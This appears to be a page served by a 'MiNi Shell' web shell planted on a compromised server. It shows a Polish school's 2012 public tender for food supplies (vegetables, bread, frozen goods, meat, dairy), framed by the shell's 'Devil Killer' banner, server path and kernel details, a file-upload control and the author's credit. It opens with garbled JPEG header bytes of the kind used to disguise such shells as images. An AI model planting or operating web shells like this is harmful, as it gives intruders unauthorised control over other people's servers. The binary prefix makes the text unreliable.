JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120416/119820-N-2012.html

<p class="kh_header"><b>Tymbark: Dostawa artykułów żywnościowych dla Szkoły Podstawowej im. Józefa Marka w Tymbarku.</b><br>
<b>Numer ogłoszenia: 119820 - 2012; data zamieszczenia: 16.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im.Józefa Marka w Tymbarku , Tymbark 354, 34-650 Tymbark, woj. małopolskie, tel. 18 3325280, faks 18 3325280.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.tymbark.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka oświatowa utworzona przez JST.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Szkoły Podstawowej im. Józefa Marka w Tymbarku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Szkoły Podstawowej w Tymbarku im. Józefa Marka, 34-650 Tymbark 354
Zamawiający dopuszcza składanie ofert częściowych.

Dostawa oznaczona jako Część I świeże warzywa i owoce będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03221000-6, 03222300-6 
Nazwa asortymentu	 Ilość	Jednostka      miary
Ziemniak bez uszkodzeń	2300kg
Kapusta biała bez uszkodzeń	290kg
Kapusta czerwona bez uszkodzeń	157kg
Kapusta kiszona 1kg woreczek	189kg
Marchew bez uszkodzeń	189kg
Pietruszka bez uszkodzeń	95kg
Jabłka 1 klasa Champion	126kg
Cebula bez uszkodzeń	44kg
Burak ćwikłowy	220kg
Seler bez uszkodzeń	13kg
Fasola Jasiek 400g	315szt.
Groch łuskany luzem	25kg
Pietruszka natka	76 pęczków
Pieczarka świeża	44kg
Kapusta pekińska	19szt.
Ogórek kiszony 350 g, woreczek foliowy 32szt.


Dostawa oznaczona jako Część II wyroby piekarskie będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15811000-6

 azwa asortymentu	 Ilość	Jednostka      miary
Bułka zwykła ( 100g)	5922 szt.
Chleb pszenny ( 550) 	44  szt. 


Dostawa oznaczona jako Część III mrożone artykuły spożywcze będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15331170-9

Nazwa asortymentu	 Ilość	Jednostka      miary
Mrożonka kompotowa 6 składnikowa zamrożona w op. do 500g	126kg
Mrożonka 6 składnikowa warzywna zamrożona w op. do 500 g	44kg
Kalafior mrożony w op. do 500 g	25kg
Fasola mrożona zielona szparagowa w op. 500 g	, 76szt.
Truskawka mrożona bez szypułek w op. do 500 g	25kg
Zupa pieczarkowa mrożona w op. do 500 g zaw. pieczarka ok. 25%	 44kg
Pyzy z mięsem mrożone w op. do 500 g zaw.
grysik ziemniaczany, mięso wieprzowe 9%, wołowe 4, 5 % 126kg
Filet panga bez glazury ( SHP)	95kg
Filet mintaj bez glazury ( SHP)	19kg

Dostawa oznaczona jako Część IV artykuły spożywcze sypkie, koncentraty, przyprawy i desery :
Kod Wspólnego Słownika Zamówień (CPV): 15800000-6

Nazwa asortymentu	 Ilość	Jednostka      miary
Majonez stołowy 850 g zaw.
olej roślinny, woda, ocet, musztarda, żółtka kurze 1,1% słoik szklany 25 szt.
Jajka ściółkowe kl. I	 4000szt.
Olej kujawski z pierwszego tłoczenia butelka z tworzywa sztucznego dopuszczona do żywności 1l 107	szt.
Musztarda stołowa 900g słoik szklany	  4szt.
Ogórek konserwowy zaw. ogórek, woda, ocet, sól, przyprawy smakowe, słoik szklany masa netto 870g 38	szt.
Cukier op. 1 kg	126kg
Cukier puder op. do 1 kg	6kg
Mąka poznańska typ 500 op. do 1 kg	113 kg
Mąka ziemniaczana 0,5 kg	13szt.
Ryż biały długoziarnisty	76kg
Makaron zacierka 250g	95szt.
Makaron świderki 500 g zaw. mąka durum	189szt.
Makaron Spaghetti 500 g zaw. mąka durum	76szt.
Makaron nitki 250 g zaw. mąka, jaja 23,8 %, woda	76szt.
Kasza jęczmienna mazurska op. do 1 kg	57kg
Kasza manna zaw. gluten	13kg
Koncentrat pomidorowy 30% 200g, słoik szklany	315szt
Sól 1kg opakowanie foliowe	76kg
Barszcz biały 0,66g zaw. mąka pszenna 12,1%, warzywa 0,9%	95szt.
Zupa pieczarkowa w proszku 0, 45 g zaw. grzyby 10,5%,warzywa 2% 110szt.
Żurek śląski 45 g zaw. mąka żytnia 14,6%, boczek prażony 5,5 %, tłuszcz roślinny 126 szt.
Zupa grochowa w proszku 0, 75 g zaw. mąka grochowa 61%, tłuszcz wędzony wieprzowy 4,5 %	63szt.
Przyprawa do zup, sosów, magii - woda, sól substancje wzmacniające, glutamin sodu E635, butelka szklana o poj. 1l	69szt.
Przyprawa warzywna do potraw 200g Vegeta lub równoważna zawierająca suszone warzywa 15,5 %  (marchew, pasternak, ziemniaki, cebula, seler, natka pietruszki), skrobia kukurydziane, węglowodany 24,5%	151szt.
Sos pieczeniowy ciemny zaw. mąka pszenna, ryżowa, warzywa suszone 2, 7% zapach E 635 25 szt.
Sos do Spaghetti, warzywa suszone 48% zioła 1%	76szt.
Sos słodko- kwaśny  zaw.
warzywa :marchew9%, cebula 9%, pomidory 8,3, papryka czerwona 8% 57	szt.
Rosół z kury w kostkach  zaw. sól, tłuszcz roślinny i i kurzy 3%, ekstrakt mięsa kurzego 0,1%. W opakowaniu 18 kostek 180g 44 opak
Pieprz mielony naturalny 20 g	 63szt.
Papryka słodka mielona 20g 	 38szt.
Liść laurowy 0,15 g	  38szt.
Czosnek granulowany 20 g	  82szt.
Ziele angielski 20 g	 38szt.
Majeranek  5g	 76 szt.


Dostawa oznaczona jako Część V  mięso świeże, wędliny i drób:
Kod Wspólnego Słownika Zamówień (CPV): 15100000-9
Nazwa asortymentu	 Ilość	Jednostka      miary
Filet z kurczaka	82kg
Schab bez kości	97kg
Karczek bez kości	141kg
Kości wieprzowe	226kg
Ćwiartka z kurczaka	220kg
Łopatka wieprzowa bez kości	346kg
Parówka z indyka	44kg
Mięso mielone wieprzowo- wołowe	19kg
Kiełbasa zwyczajna kotlarska	  158kg
Żeberka wieprzowe ekstra	23kg
Wątróbka drobiowa	 25kg
Smalec 200g w kostkach	139szt.



Dostawa oznaczona jako Część VI  mleko i produkty mleczarskie:
Kod Wspólnego Słownika Zamówień (CPV):  15500000-3

 Nazwa asortymentu	 Ilość	Jednostka      miary
Margaryna 250 g zaw. tłuszczu palmowego 30%, olej roślinny 0,3%, ogólna zawartość tłuszczu 80 %	265szt.
Mleko 3,2% woreczek w op. do 1l	16litr
Masło ekstra 200g zaw. tłuszczu 82%	277szt.
Ser biały tłusty zawartość tłuszczu min. 7 %	44kg
Śmietana kremowa 30% pasteryzowana 400g	403szt.
Śmietana ukwaszona 15 % 500g	19szt.


Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do siedziby Zamawiającego znajdującej się w Tymbarku 345. Każdy z produktów powinien być dostarczony w wymaganych opakowaniach.
Cykliczne dostawy  będą realizowane jak następuje: 
    - Część I świeże warzywa i owoce - w drugim dniu od złożenia zamówienia od
       poniedziałku do piątku w godzinach od  8.00 do   14.00.
    - Część II  wyroby piekarskie - codziennie w drugim dniu od złożenia zamówienia od poniedziałku do  piątku w godz. od 8.00   do  10.00.
    - Część III  mrożone artykuły spożywcze - w  drugim dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od 8.00 do 14.00.
    - Część IV artykuły spożywcze sypkie, koncentraty, przyprawy i desery - dwa razy w tygodniu w drugim  dniu od złożenia zamówienia od poniedziałku do piątku w godz. od 8.00 do 14.00.
    - Część V  mięso świeże, wędliny i drób - trzy razy w tygodniu w drugim     dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od 8.00 do 14.00.
    - Część VI  mleko i produkty mleczarskie - dwa razy w tygodniu w drugim dniu od złożenia zamówienia od poniedziałku do piątku w godz. od 8.00 do 14.00.

Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane produkty z podaniem ilości.
Produkty muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
W przypadkach, w których Zamawiający użył nazw własnych dla określenia walorów smakowych produktów, Zamawiający dopuszcza produkty o walorach smakowych takich samych lub wyższych- produkty równoważne.
Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa towaru wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 

Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie towaru do siedziby Zamawiającego na okres do następnej dostawy.
Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona  w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia  zamówienia.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
Dopuszcza się możliwość zamiany ilości poszczególnego asortymentu. 
Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanego towaru  i dostarczenia nowej partii do siedziby  Zamawiającego  w dniu złożenia reklamacji.
Do składania zamówień Zamawiający upoważni wybranego pracownika..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który:
1)wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, co najmniej dwie dostawy artykułów żywnościowych, 
Ocena spełniania przez Wykonawcę warunków udziału w postępowaniu będzie dokonana na podstawie złożonych przez Wykonawcę oświadczeń, o których mowa w części IV pkt 1 i 2 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp.tymbark.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. Józefa Marka
34-650 Tymbark 354.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2012 godzina 10:00, miejsce: Szkoła Podstawowa im. Józefa Marka
34-650 Tymbark 354.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com